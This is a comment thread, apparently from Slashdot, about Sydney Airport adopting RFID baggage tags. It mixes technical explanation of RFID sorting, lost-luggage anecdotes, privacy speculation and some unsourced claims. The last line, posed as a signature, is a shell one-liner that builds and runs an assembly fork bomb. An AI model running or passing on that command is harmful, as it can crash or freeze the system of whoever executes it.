Sydney Airport to Instate RFID Baggage Tags
AcidAUS writes "Australia's Sydney Airport is investigating high-tech tagging methods for baggage handling, which could greatly reduce the number of bags that go missing each year. Industry experts say that baggage mishandling costs the industry globally $US1.7 billion each year, and that much of this cost is due to failures in the barcode-based tagging system."
Unfortunatly, better tagging is not a guarantee that things will go better with baggage. Growing passenger numbers and improved security procedures are the main factors fuelling estimated annual losses of one billion US dollars for the world's airlines in missing and mishandled baggage.
In almost all cases, baggage IS correcty tagged, but it's as always the human factor which fails to function correctly. Because all security restrictions, the baggage is now in many cases manually examined and the volume of the baggage traffic and personal stress are still the main causes for missing or damaged baggage.
It's time to realise that Abble's products are the biggest abomination these days. Just say NO to the dumb iAbble way!!
Industry experts say that baggage mishandling costs the industry globally $US1.7 billion each year, and that much of this cost is due to failures in the barcode-based tagging system. ...and RFID, which is much like barcode except for the (far more insecure) scanning method is supposed to correct the "problem"? I smell an ulterior motive.
Push Button, Receive Bacon
KLM and Air France are already running a pilot project (pun not intended) on their service between Paris and Amsterdam. (See for example http://www.rfidjournal.com/article/articleview/260 0/1/1/ or go google yourself)
-- Sig (appended to the end of comments you post, 120 chars)
The next step will be RFID in passports, after that RFID tag at birth, under the skin. And while they're at it they might as well take a DNA sample.
That's not a futuristic scenario anymore... Sweden, a leader in this field, now has RFID tags in passports and has been collecting and storing DNA samples of everyone born since 1980. It's true, check it out.
Tell your friends about xenu.net
One time I flew with EasyJet from Copenhagen to London. The devices that moved the luggage weren't working, so instead of waiting for them to work they decided to just put us all on the airplane, fly it in into the sky, and THEN tell us our luggage was left in Copenhagen. Thankfully it was the end of my trip, so no big loss. Not so thankful for a group of 4 girls who were just starting their 3 month vacation around Europe and everything they took with them was now gone. They had no place to have the airline send their luggage to either. Goooood times. Unfortunately, I don't think RFID will resolve general douchebaggery.
> Better put on your RFID enabled tinfoil hat, then.
Yeah, doesn't anyone care about the right of baggage not to be monitored all the time, and treated like a criminal. It's important. First they monitor baggage, and then they'll put tattoos on your head and kill you.
How about using RFID tags on fucking FedEx, UPS and DHL deliveries? The current system is so illogical and antiquated, it's ludicrous. God knows how many times I've checked in on an item only to find the page hasn't been updated for four days. Sure, sometimes it works (I had updates about three times a day when tracking an item from Manhattan to Osaka using FedEx, that was nice) but most of the time it fails horribly and you come to know the tracking number as merely a "Reference Number For When The Package Goes Missing Or Gets Delayed"...
Airports have been experimenting with this since at least 2001, and many are using it in production.
Contrary to what some posters assumed, rfid DOES in fact help quite a bit the baggage handling system:
- rfid reader can read tags which sit on the bottom / opposite end of the suitcase, while barcode readers cannot do it. The overall positive-read ratio is much increased. The tags are smaller and less prone to tear-off/smearing of the barcode print
- rfid card readers can read many tags at a time, hence the conveyor line can be sped up a lot (as in: put all baggages on the truck to the runaway, and the rfid reader is put on top of the gate below which the truck passes)
- if the complete baggage info, such as final destination, status of x-ray-check, etc is stored on the tag (there are quite a few bytes in there), any tag reader can decode it and sort the baggage even in the absence of network connection , ie . without interrogating a central db. Smaller devices, not even wifi-connected, can be used to recover info from baggages that are found stray in any airside area (and a working 802.11 inside a bhs system or covering a complete runaway is radio nightmare,trust me).
Downside: if that info is not crypted, it could be eavesdropped...
Of course, the point is still valid that all the new anti-terrorism measures are quite a nightmare for airports and airline handlers, and have a great impact on operative efficiency.
I got a lesson about the baggage bar-code system a few years ago. I was flying from Calgary to Washington DC via Toronto -- you have to retrieve your bags in Toronto so you can clear US customs in Canada, plus there's extra security for Washington-bound flights (special secure gate, mandatory hand-search of carryons, baggage matching), so if the bags don't show, you miss your connection.
Well, my bag didn't show. I asked the clerks to check the computer and find out where it was, and they said they couldn't. I eventually pressed them as to why, suggesting that the bar codes might be useful, and they said the bar codes were not actually ever scanned. Now, that may have been true, or they may have been trying to get rid of a pestering customer, but it was clear in any case that the computer did not know where my bag was. They could not even confirm that it had been loaded on the flight out of Calgary. They had no idea at all.
As it turned out, it had been mistakenly directed to the domestic arrivals carousel instead of the US connections carousel, and I was able to retrieve it and go on my way.
I would love it if some kind of actually-useful, actually-used baggage tracking system were implemented.
2*3*3*3*3*11*251
Well one of the editors would need to read the article.
Good God man, the whole fabric of spacetime would be put at risk.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;